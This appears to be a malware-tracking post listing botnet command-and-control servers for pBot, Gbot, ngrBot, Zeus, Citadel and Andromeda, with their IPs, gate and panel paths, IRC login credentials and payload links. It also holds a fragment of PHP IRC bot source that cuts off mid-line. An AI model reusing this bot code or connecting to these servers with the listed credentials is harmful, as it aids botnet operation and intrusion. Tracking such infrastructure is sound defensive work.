Resolved kiz.no-ip.biz to 94.242.238.213
Server: kiz.no-ip.biz
Gate file: /xen/ride/gate.php
Hosting info: http://whois.domaintools.com/94.242.238.213
irc.by (Linux pBots hosted in Netherlands Netrc Llc)
Resolved : [irc.by] To [91.214.111.26]
Here is the pBot:
<!--
set_time_limit(0);
error_reporting(0);
class pBot {
 var config = array("server"=>"irc.by",
                    "port"=>6669,
                    "pass"=>"fx",
                    "prefix"=>"fvox",
                    "maxrand"=>8,
                    "chan"=>"#webs",
                    "key"=>"",
                    "modes"=>"+iB-x",
                    "password"=>"webs",
                    "trigger"=>".",
                    "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname
                    );
 var users = array();
 function start() {
  if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30)))
   this->start();
  ident = "";
  alph = range("a","z");
  for(i=0;i<this->config['maxrand'];i++)
   ident .=
othar.tk (Gbot http bot hosted by mchost.ru)
Resolved othar.tk to 178.208.80.88
Server: othar.tk
Gate file: //getcmd.php
Hosting info: http://whois.domaintools.com/178.208.80.88
46.165.209.181 (ngrBot hosted in Germany Frankfurt Am Main Leaseweb Germany GmbH)
Server: 46.165.209.181:1887
Server: 95.211.211.69:1887
Now talking in #pool
Topic On: [ #pool ] [ ~pu hxxp://www.sendspace.com/pro/dl/cbl9jc 0dd3c01bdc07bd74c7eb7d76488f7858 -r ]
Topic By: [ google ]
Modes On: [ #pool ] [ +smntMu ]
Traffic – by DNS samples downloaded by this exe
Hosting info: http://whois.domaintools.com/46.165.209.181
musicdisk.net (Zeus hosted in Germany Frankfurt Am Main Intergenia Ag)
Resolved : [musicdisk.net] To [85.25.2.9]
Panel: http://www.musicdisk.net/zeus/
config.bin: www.musicdisk.net/zeus/cfg.bin
bot.exe: hxxp://www.musicdisk.net/zeus/bot.exe
Hosting info: http://whois.domaintools.com/85.25.2.9
tassweq.com (ngrBot hosted in United States West Chester Privatesystems Networks Ca)
There is no sample, so I can't post channels; you can see if you can find channels yourself.
Resolved : [tassweq.com] To [67.222.19.155]
Resolved : [zerx-virus.biz] To [67.222.19.155]
Server: tassweq.com:7000
PASS trb123trb
NICK ydgchu
USER rqqlrc “” “ooq” :rqqlrc
UPDATE:
Server: zerx-virus.biz :4040 PASS trb123trb
Server: tassweq.com :4040 PASS trb123trb
67.222.19.155:4040
Nick: n{US|XPa}radwklw
Username:
animalrights.co.in (Citadel banking malware hosted by MegaHoster.Net)
Resolved animalrights.co.in to 85.25.97.204
Server: animalrights.co.in
Gate file: /netwolf/wolf.php
Config file: /netwolf/file.php
Additional locations of interest:
/backup/
/cmd/images/
/cmd/cp.php
Hosting info: http://whois.domaintools.com/85.25.97.204
vg-update.ru (Andromeda http botnet hosted by voxility.net)
Resolved vg-update.ru to 37.221.170.75
Server: vg-update.ru
Gate file: /gi8i/hTcP/dy0v/header.php
Hosting info: http://whois.domaintools.com/37.221.170.75
winterprofit.com (Gbot http botnet hosted by metrabyte.co.th)
Resolved winterprofit.com to 119.59.99.200
Server: winterprofit.com
Gate file: /exm/getcmd.php
The idiot who owns this set up the bot so that it has http:// in the DNS request. Good luck getting any bots to connect.
Hosting info: http://whois.domaintools.com/119.59.99.200
gwassnet.com (Andromeda http botnet hosted by voxility.net)
Resolved gwassnet.com to 37.221.170.240
Server: gwassnet.com
Gate file: /gwas/Panel/image.php
I’m going to guess this is the same guy as the other gwass domain.
Also, bitcoin mining info: http://Hung:28787@pool.bitclockers.com:8332
Hosting info: http://whois.domaintools.com/37.221.170.240